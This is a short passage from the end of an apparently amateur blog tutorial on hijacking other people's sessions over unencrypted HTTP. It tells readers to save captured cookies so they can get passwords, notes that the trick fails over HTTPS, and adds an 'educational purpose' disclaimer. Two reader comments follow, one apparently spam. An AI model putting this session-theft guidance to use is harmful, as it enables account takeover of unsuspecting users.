      now you could hack em..
      if u want to get their password
      then long press on session and save the cookies

      to know how to use the cookies go here

      IMPORTANT :CANNOT HACK IF PERSON USES HTTPS insted of HTTP
      Disclaimer: This tutorial is only for educational purpose. The author or the blog owner is not responsible for any kind of misuse of this information provided.

      2 comments:

      1. I have never read this information before. This is really an amazing topic which means a lot.
        four hole swing hangers

        ReplyDelete